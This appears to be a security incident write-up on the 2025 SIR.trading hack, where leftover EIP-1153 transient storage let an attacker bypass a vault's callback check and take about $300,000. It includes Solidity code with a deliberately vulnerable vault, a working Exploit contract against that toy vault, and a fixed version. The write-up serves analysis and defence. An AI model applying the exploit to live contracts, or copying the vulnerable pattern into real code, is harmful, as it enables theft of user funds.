A transient storage vulnerability led to a $300,000 hack of an Ethereum project.


An On-Chain Heist Triggered by Transient Storage: The $300,000 Loss Behind It

On March 30, 2025, SIR.trading, an on-chain leveraged trading project on Ethereum, was attacked and lost assets worth more than $300,000. The security team that analyzed the incident reconstructed how the attack worked and why the contract was exploitable.

Fatal Residue: A $300,000 on-chain Heist Triggered by Transient Storage

Event Background

The attacker exploited transient storage, a feature that Solidity 0.8.24 exposes through the tstore and tload inline-assembly opcodes introduced by EIP-1153 in the Cancun upgrade. This data location was designed as a cheap, transaction-scoped scratch space. Its main properties are:

  1. Low gas cost: tstore and tload each cost a flat 100 gas, with no cold/warm distinction and no refund accounting.
  2. Transaction-scoped persistence: a value written with tstore stays readable by every later call in the same transaction, including calls that enter the contract again through a different function.
  3. Automatic clearing: when the transaction ends, every transient slot resets to zero without anyone having to write to it.
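As an added illustration of these three properties (my own code, not code from the page or from SIR.trading; the contract and function names are hypothetical), a minimal contract pair that makes them observable. It needs solc 0.8.24 or later compiled for the Cancun EVM, since in that version tstore/tload are only reachable through inline assembly:

```solidity
// SPDX-License-Identifier: MIT
// Added illustration of transient storage semantics; hypothetical names,
// not code from SIR.trading or the analysis above.
// Needs solc >= 0.8.24 targeting the Cancun EVM (EIP-1153 tstore/tload).
pragma solidity ^0.8.24;

contract TransientDemo {
    // Transient storage has its own 256-bit key space, so key 0 here does not
    // collide with regular storage slot 0 of this contract.
    uint256 private constant KEY = 0;

    function set(uint256 value) external {
        uint256 key = KEY;
        assembly { tstore(key, value) }   // flat 100 gas, no refund bookkeeping
    }

    function get() external view returns (uint256 v) {
        uint256 key = KEY;
        assembly { v := tload(key) }      // flat 100 gas
    }
}

// Drives two separate external calls inside one transaction.
contract TransientProbe {
    TransientDemo public immutable demo;

    constructor() {
        demo = new TransientDemo();
    }

    // Returns what a *second* call observes within the same transaction:
    // `value`, not 0, because tstore'd data lives until the transaction ends.
    // Call demo.get() afterwards in a fresh transaction and it returns 0:
    // the slot was reset automatically, without anyone writing to it.
    function probe(uint256 value) external returns (uint256 seenInSameTx) {
        demo.set(value);
        seenInSameTx = demo.get();
    }
}
```

Deploy TransientProbe and send probe(42) as a transaction: the returned value is 42, showing that the second external call still sees what the first one wrote. Then call demo.get() in a new transaction (or an eth_call) and it returns 0. The second observation is exactly what makes the residue dangerous: the value is gone only once the transaction is over, not when the function that wrote it has returned.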


Source of Attack

The root cause is that values written to transient storage with tstore inside a function were not cleared when that function returned. Because transient storage survives for the rest of the transaction, whatever was last written to the slot (here, a minting amount the attacker controlled) stayed readable by later calls. The attacker deployed a contract whose address equals that leftover value, so a permission check that compared the caller's address against the transient slot passed, and the attacker was able to transfer tokens out of the contract.


Attack Process

  1. The attacker created two malicious tokens, A and B, created pools for them on a DEX, and added liquidity.

  2. The attacker called the Vault contract's initialize function to create a leveraged trading market with token A as collateral and token B as the debt token.

  3. The attacker called the Vault contract's mint function, depositing debt token B to mint leveraged tokens. During this call the Vault wrote the DEX pool address and then the minted amount to transient storage, and did not clear them when mint returned.

  4. The attacker deployed a malicious contract whose address is equal to the minted amount still sitting in transient storage.

  5. From that contract, the attacker called the Vault contract's callback function. The callback compared msg.sender with the value in transient storage; because that value was the stale minted amount rather than the pool address, and the malicious contract's address matched it, the permission check passed.

  6. Finally, the attacking contract called the Vault's callback function directly and used it to transfer out other tokens held by the Vault (WBTC, WETH and so on) for profit.

Because transient storage resets when the transaction ends, steps 3 to 6 had to run inside a single transaction; the attacking contract orchestrated the mint, the deployment and the direct callback calls in one go.
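The following is an added, deliberately simplified model of the pattern the six steps describe. It is my own code, not SIR.trading's Vault, not Uniswap, and not the real callback signature (Uniswap V3's is uniswapV3SwapCallback); MockPool, swapCallback, T_SLOT, T_POOL and Exploit are hypothetical names. It puts the vulnerable vault beside a hardened one: the callback authenticates its caller by comparing msg.sender with a transient slot, mint() fills that slot with the pool address, then reuses it for the minted amount and never clears it, and an attacker contract whose address equals that amount gets through. To stay self-contained, the attacker contract exists first and chooses the amount to match its own address, the reverse of the incident's order (where the contract was deployed to match an already-stored amount); the bypass is the same.

```solidity
// SPDX-License-Identifier: MIT
// Added, deliberately simplified model of the bug class described above.
// NOT SIR.trading's Vault, Uniswap, or any project's real code; every name
// here (MockPool, swapCallback, T_SLOT, T_POOL, Exploit) is hypothetical.
pragma solidity ^0.8.24;

interface ISwapCallback {
    function swapCallback(int256 amountOwed, bytes calldata data) external;
}

// Stand-in for a DEX pool: swap() re-enters its caller, as Uniswap V3 pools do.
contract MockPool {
    function swap(int256 amount, bytes calldata data) external {
        ISwapCallback(msg.sender).swapCallback(amount, data);
    }
}

// VULNERABLE: the callback authenticates msg.sender against a transient slot that
// mint() fills with the pool address, then reuses for the minted amount, and never clears.
contract VulnerableVault {
    uint256 private constant T_SLOT = 1;          // one slot, two meanings
    mapping(address => uint256) public balance;

    function mint(address pool, int256 amount) external returns (uint256 minted) {
        require(amount > 0, "amount");
        uint256 slot = T_SLOT;
        assembly { tstore(slot, pool) }           // who is allowed to call back
        MockPool(pool).swap(amount, "");          // pool re-enters swapCallback below
        minted = uint256(amount);                 // toy 1:1 minting
        assembly { tstore(slot, minted) }         // amount overwrites the auth slot
        balance[msg.sender] += minted;
        // BUG: nothing resets the slot; `minted` stays readable until the tx ends.
    }

    function swapCallback(int256, bytes calldata) external {
        uint256 slot = T_SLOT;
        uint256 expected;
        assembly { expected := tload(slot) }
        // Compares against whatever is currently in the slot, pool address or not.
        require(msg.sender == address(uint160(expected)), "not pool");
        balance[msg.sender] += 1;                 // stand-in for a privileged action
    }
}

// Attacker: one transaction that mints with an amount equal to its own address,
// then calls the callback directly while that value is still in the slot.
// Simplification: the real attacker deployed a contract whose address matched a
// previously stored amount; here the contract exists first and picks the amount.
contract Exploit {
    function run(VulnerableVault vault, address pool) external {
        int256 forged = int256(uint256(uint160(address(this))));
        vault.mint(pool, forged);                 // leaves tload(T_SLOT) == address(this)
        vault.swapCallback(0, "");                // "not pool" check passes
    }
}

// HARDENED: a dedicated slot for the auth value, cleared as soon as the external
// call returns, and the amount never written to a slot used for authentication.
contract FixedVault {
    uint256 private constant T_POOL = 1;
    mapping(address => uint256) public balance;

    function mint(address pool, int256 amount) external returns (uint256 minted) {
        require(amount > 0, "amount");
        uint256 slot = T_POOL;
        assembly { tstore(slot, pool) }
        MockPool(pool).swap(amount, "");
        assembly { tstore(slot, 0) }              // FIX: clear before doing anything else
        minted = uint256(amount);
        balance[msg.sender] += minted;
    }

    function swapCallback(int256, bytes calldata) external {
        uint256 slot = T_POOL;
        uint256 expected;
        assembly { expected := tload(slot) }
        require(expected != 0 && msg.sender == address(uint160(expected)), "not pool");
        balance[msg.sender] += 1;
    }
}
```

Deploy MockPool, VulnerableVault and Exploit, then call Exploit.run(vault, pool): balance[address(exploit)] ends up incremented by the callback even though the pool never invoked it, because the slot still held the forged amount when the direct call arrived. The same sequence against FixedVault reverts with "not pool": the slot is zero the moment mint() has finished with the pool, and the amount is never written anywhere the callback reads. Note that everything in run() happens in one transaction; had the mint and the direct callback been separate transactions, the residue would already have been reset.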


Capital Flow Analysis

According to on-chain analysis tools, the attacker stole roughly $300,000 worth of assets, including:

  • 17,814.8626 USDC
  • 1.4085 WBTC
  • 119.871 WETH

These assets were then swapped to WETH and sent to an anonymizing service. The attacker's initial funding, 0.3 ETH, had come from that same service.


Security Recommendations

To prevent similar attacks, the project team should:

  1. Clear transient slots explicitly with tstore(key, 0) as soon as the value has served its purpose, before the function returns, rather than relying on the reset at the end of the transaction. A slot that holds an authentication value (such as the pool address allowed to call back) should be cleared immediately after the external call it guards has returned.
  2. Never reuse one transient slot for values with different meanings; here the same slot held a pool address and then a user-influenced minted amount, which is what let an attacker-chosen value pass as a caller address.
  3. Strengthen contract code auditing and security testing, including tests that call privileged callbacks directly after the normal flow has run within the same transaction.
  4. Use newly introduced language features with caution and fully understand their semantics and potential risks before relying on them for access control.

This incident again highlights the need to balance security against the adoption of new technology in blockchain development. As the technology evolves, developers and security researchers need to stay vigilant and identify and respond to new classes of risk promptly.

Comments
Web3ExplorerLin · 12m ago
hypothesis: transient storage isn't just a tech feature... it's practically Schrödinger's memory in the blockchain realm tbh. Fascinating how 300k got rekt due to quantum-like state persistence...

SchrodingerAirdrop · 16h ago
Can't even afford gas; deserves to be played for a sucker.

MemeTokenGenius · 08-07 07:48
So cute, went live without even testing?

quiet_lurker · 08-07 07:48
Another project run into the ground.

PumpBeforeRug · 08-07 07:48
I heard this time they'll just turn around and run away~ a small smart-contract vulnerability.

MEVHunter · 08-07 07:48
This 300,000 is too cheap; I'm too lazy to run flash loans.

ContractSurrender · 08-07 07:44
Old project, all in on new features, cool...

MissedAirdropAgain · 08-07 07:42
Oh, it's just a small sum of 300,000.

NeverPresent · 08-07 07:27
Such a low-level vulnerability can still be exploited?